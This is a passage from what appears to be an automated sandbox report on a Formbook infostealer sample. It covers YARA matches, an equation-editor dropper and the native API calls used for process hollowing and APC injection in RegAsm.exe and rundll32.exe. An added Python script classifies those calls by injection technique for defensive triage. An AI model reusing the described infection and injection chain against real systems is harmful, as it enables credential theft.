          Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_004C00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_004C1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_00418180 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_00418230 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_004182B0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_00418360 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0041822A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_004182AA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0041835E NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A0060 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A10D0 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A1148 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A010C NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_027A01D4 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FA50 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FA20 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 5_2_0279FAB8 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FB50 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279F8CC NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279F938 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A1930 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FE24 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FF34 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FFFC NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC48 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0C40 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC30 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FD5C NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540078 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540060 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02541148 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02541930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02541D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E8180 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E8230 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E82B0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E8360 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E822A NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E82AA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E835E NtAllocateVirtualMemory,
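The rows above list, per injected process (RegAsm.exe as process 5, rundll32.exe as process 7), the native API functions the sample's own code resolves and calls. The Python script below is an added triage example and is not part of the Joe Sandbox report: it parses rows in exactly this format (the sample rows are constructed copies of rows from the report, in both separator styles), groups the Nt* names by process image, and flags the call clusters that match the injection techniques the report's signatures name. The mapping of API sets to technique names, and the reading of rows that pair an Nt* call with LdrInitializeThunk as a hint that ntdll is reached through FormBook's own copy of the library, are the script's assumptions, not statements the report makes.

```python
"""Added triage helper, not part of the sandbox report: parse the report's
'Code function: <proc>_<stage>_<addr> <Api>,<Api>,' rows, group the native
API names by process image and flag the call clusters that together make up
the injection techniques the report's signatures name (process hollowing,
section mapping, APC queueing, thread-context hijacking)."""
import re
from collections import defaultdict

# Row shape as it appears in the report. The image name and 'Code function:'
# may be run together (extraction artifact) or separated by ' | '.
ROW_RE = re.compile(
    r"Source:\s*(?P<image>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]+)(?P<calls>.*)$"
)

# Minimal API set per technique. Assumption: this is the set a detection
# engineer requires before naming the technique; the report only lists the
# calls, it does not say which of them belong together.
TECHNIQUES = {
    "process_hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "section_mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "apc_injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "thread_hijack": {"NtSuspendThread", "NtGetContextThread",
                      "NtSetContextThread", "NtResumeThread"},
}

# Constructed sample: rows copied in the report's format, in both separator
# styles, plus one row whose function has no resolved symbol.
SAMPLE_ROWS = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FE24 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A1930 NtSetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0253FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0253FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0253FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0253FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02541930 NtSetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02540078 NtResumeThread,
Source: C:\Users\Public\vbc.exeCode function: 4_2_00BFFF88
"""


def parse_rows(text):
    """Yield (image, process number, address, [called names]) per matching row."""
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        calls = [c for c in m.group("calls").strip().split(",") if c]
        yield m.group("image"), int(m.group("proc")), int(m.group("addr"), 16), calls


def analyze(text):
    """Return {image: {"procs", "apis", "ldr_thunk_rows", "techniques"}}."""
    per_image = defaultdict(lambda: {"procs": set(), "apis": set(),
                                     "ldr_thunk_rows": 0, "techniques": []})
    for image, proc, _addr, calls in parse_rows(text):
        entry = per_image[image]
        entry["procs"].add(proc)
        nt_calls = {c for c in calls if c.startswith("Nt")}
        entry["apis"].update(nt_calls)
        # Rows pairing an Nt* call with LdrInitializeThunk. FormBook is publicly
        # documented to call ntdll through its own copy of the library rather
        # than the import table; counting these rows as a hint of that is an
        # interpretation, not something the report states.
        if nt_calls and "LdrInitializeThunk" in calls:
            entry["ldr_thunk_rows"] += 1
    for entry in per_image.values():
        entry["techniques"] = sorted(
            name for name, needed in TECHNIQUES.items() if needed <= entry["apis"])
    return dict(per_image)


if __name__ == "__main__":
    for image, info in analyze(SAMPLE_ROWS).items():
        print(f"{image}: procs={sorted(info['procs'])} nt_apis={len(info['apis'])} "
              f"ldr_thunk_rows={info['ldr_thunk_rows']} techniques={info['techniques']}")
```

Run against the report's full row set, the script flags process hollowing, section mapping and APC queueing for both RegAsm.exe and rundll32.exe, which is what the "Sample uses process hollowing technique", "Maps a DLL or memory area into another process" and "Queues an APC in another process" signatures in the summary report; the value of the per-image view is that it shows the same stub set lives in the .NET host and in the system process it injected into.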
Source: C:\Windows\SysWOW64\cmd.exe | File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00BFFF88
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00BFF37F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041B99F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041CB27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00408C2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00408C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041C53B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027AE2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02851238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027FA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B7353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_028563BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B2305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027D63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027AF3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027C905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B3040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027DD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027AE0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0282D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027FA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02852622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027BE6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B4680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0283579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027E57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027BC7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027ED47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0283443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027C1489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027E5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027F6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_028305E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027CC5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02863A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0285CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02836BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0283DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027D7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027AFBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027D286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027BC85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0282F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0284F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0285098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027C69FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0283394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B29B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02835955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027CEE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027E2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027DDF7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0284CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027C0F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02822FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027BCD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027E0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0284FDDD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025F1238
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0254E2E9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02557353
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0259A37B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02552305
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025763DB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0254F3CF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025F63BF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0256905A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02553040
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025CD06D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0257D005
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0254E0C6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0259A634
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025F2622
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0255E6C1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02554680
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025857C3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025D579A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0255C7BC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0258D47D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025D443E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02585485
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02561489
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02596540
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0255351F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0256C5F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025D05E3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02603A83
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02577B00
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0254FBD7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025DDBDA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025D6BCB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025FCBA4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0255C85C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0257286D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025CF8C4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025EF8EE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025D5955
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025D394B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025669FE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025F098E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025529B2
